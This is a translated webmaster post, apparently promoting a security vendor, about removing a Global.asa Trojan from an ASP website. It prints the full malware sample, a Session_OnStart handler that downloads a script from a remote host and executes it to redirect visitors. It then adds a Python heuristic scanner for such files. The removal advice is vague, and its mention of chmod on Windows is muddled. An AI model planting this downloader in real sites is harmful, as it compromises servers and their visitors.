A solution for the Global.asa website Trojan

Source: Internet
Author: User


While reviewing my site's traffic statistics recently, I found some unusual traffic, so I checked the website's program files and found one extra file. The file is named Global.asa and was uploaded on the night of September 13. My site is built on an open-source enterprise site-building system, and at first I did not pay attention to this problem. Yesterday my site's traffic suddenly dropped to a low, and I suspected that the site program had a problem, but I could not find the fault. Then customers who often visit the site called to tell me: "Opening your site from Baidu automatically jumps to some pornographic sites, and 360 warns of a Trojan virus." So I searched online for ways to deal with the Global.asa Trojan, and below I describe my solution.

What is the Global.asa Trojan?

Baidu Encyclopedia introduces Global.asa as follows:

The Global.asa file is an optional file that can contain declarations of objects, variables, and methods that can be accessed by every page in an ASP application. All legitimate browser scripts can be used in Global.asa. In Global.asa, we can tell the Application and Session objects what to do when they start and when they end. The code that does this is placed in event handlers.

From the introduction above, we can see that this Trojan is in fact a website program Trojan, also known as a script Trojan. But why do attackers name it Global.asa? Because this file can invoke many routines; for example, when a client visits your site, it can issue a redirect. Because of this special role of the Global.asa file, attackers exploit it and turn it into a Trojan horse.

First, let's look at the code for the Global.asa Trojan:

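<script language="vbscript" runat="server">
Sub Session_OnStart
    ' Suppress errors so visitors never see a failure
    On Error Resume Next
    ' Remote payload location (host masked in the original article)
    Url = "Http://www.********.info:1680/global/xmlfilecode.gif"
    ' Fetch the payload from the server side
    Set objXmlHttp = Server.CreateObject("Msxml2.ServerXMLHTTP")
    objXmlHttp.Open "GET", Url, False
    objXmlHttp.SetRequestHeader "user", Url
    objXmlHttp.Send
    getHtml = objXmlHttp.ResponseBody
    Set objXmlHttp = Nothing
    ' Convert the binary response to gb2312 text via ADODB.Stream
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Type = 1
    objStream.Mode = 3
    objStream.Open
    objStream.Write getHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "gb2312"
    getHtml = objStream.ReadText
    objStream.Close
    Set objStream = Nothing
    ' Run the downloaded text as VBScript only if it contains the marker string
    If InStr(getHtml, "by*aming") > 0 Then
        Execute getHtml
    End If
End Sub

Sub Session_OnEnd
End Sub
</script>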

Let me first explain what this code does. Global.asa is the startup file of a web application: the Application_OnStart section runs when the site is first accessed, and the Session_OnStart section runs the first time each user visits. This code therefore automatically downloads the Trojan content whenever the site is visited. The sample above is Trojan code whose purpose is to redirect visitors.

Symptoms of a Global.asa Trojan infection

The Global.asa file is hidden, so you cannot see it over FTP; the Sinesafe website Trojan detection tool can detect the hidden Global.asa Trojan. When users click through from Baidu, the site automatically jumps to other sites, such as pornographic sites and virus sites. A Baidu site: query for your own site will then show that many pornographic pages have been indexed, as in the following image:

  

If a webmaster finds that their site also shows the symptoms above, then congratulations: the site has the Trojan.
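As an added example (not from the original article or from Sinesafe), here is a heuristic scanner for the pattern described above: it walks a copy of the web root, finds every Global.asa, notes hidden or system attributes where the platform exposes them, and flags event handlers that both create an HTTP client object and call Execute. The regex indicators, the function names and the sample with its placeholder URL are assumptions constructed for illustration.

```python
import os
import re
import stat

# Heuristic indicators taken from the sample on this page (assumed, not exhaustive).
HANDLER = re.compile(r"^\s*sub\s+((?:session|application)_on(?:start|end))\b(.*?)^\s*end\s+sub",
                     re.I | re.M | re.S)
FETCH = re.compile(r"createobject\s*\(\s*\"[^\"]*(xmlhttp|winhttp)", re.I)
EXEC = re.compile(r"(?<![.\w])(execute(global)?|eval)\b", re.I)

# Constructed sample mirroring the structure of the code above; the URL is a placeholder.
SAMPLE = '''Sub Session_OnStart
Url = "http://example.invalid/placeholder.gif"
Set objXmlHttp = Server.CreateObject("Msxml2.ServerXMLHTTP")
objXmlHttp.Open "GET", Url, False
objXmlHttp.Send
getHtml = objXmlHttp.ResponseText
If InStr(getHtml, "marker") > 0 Then
Execute getHtml
End If
End Sub
'''


def analyse_global_asa(text):
    """Return the event handlers that both fetch remote content and execute code dynamically."""
    flagged = []
    for match in HANDLER.finditer(text):
        name, body = match.group(1), match.group(2)
        if FETCH.search(body) and EXEC.search(body):
            flagged.append(name)
    return flagged


def scan_webroot(root):
    """Find every global.asa (any case) under root; report attributes and flagged handlers."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            if filename.lower() != "global.asa":
                continue
            path = os.path.join(dirpath, filename)
            # st_file_attributes exists only on Windows; elsewhere this stays 0.
            attrs = getattr(os.stat(path), "st_file_attributes", 0)
            hidden = bool(attrs & (stat.FILE_ATTRIBUTE_HIDDEN | stat.FILE_ATTRIBUTE_SYSTEM))
            with open(path, encoding="latin-1") as handle:
                flagged = analyse_global_asa(handle.read())
            report.append({"path": path, "hidden_or_system": hidden, "flagged": flagged})
    return report
```

A flagged handler is a lead for manual review, not proof of infection; the `hidden_or_system` field is only meaningful when the script runs on Windows against the live directory.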

How do you delete the Global.asa Trojan?

The Global.asa file is generally in the root directory. I tried many times and could not delete it; I also changed the file attributes and still could not remove this stubborn Trojan. In the end I found Sine Security, and they removed the Trojan with the chmod command. If you cannot delete it yourself, you can ask your hosting provider to delete the Trojan for you.

Because Global.asa is marked as a system file, it can only be forcibly deleted from the cmd command line.

Finally, one more point: why does a site get a Global.asa Trojan planted on it? The root cause is that the site has vulnerabilities: attackers exploit them to gain privileges on your site and upload the Trojan they have made. If you make the site secure, it will not be compromised. Do not underestimate site security; it is particularly important and weighs on every webmaster's mind. If the site is not secure, Baidu will penalize it, and a site you worked hard to build is ruined, which no one would accept. Only a secure site brings a stable source of customers, so security issues cannot be ignored. Giving users a secure and stable website platform will, of course, also bring you the greatest marketing benefit.

Source of this article: gm.sinesafe.cn (website Trojan infection), A5. Reprints are welcome; please indicate the author and source. Thank you!
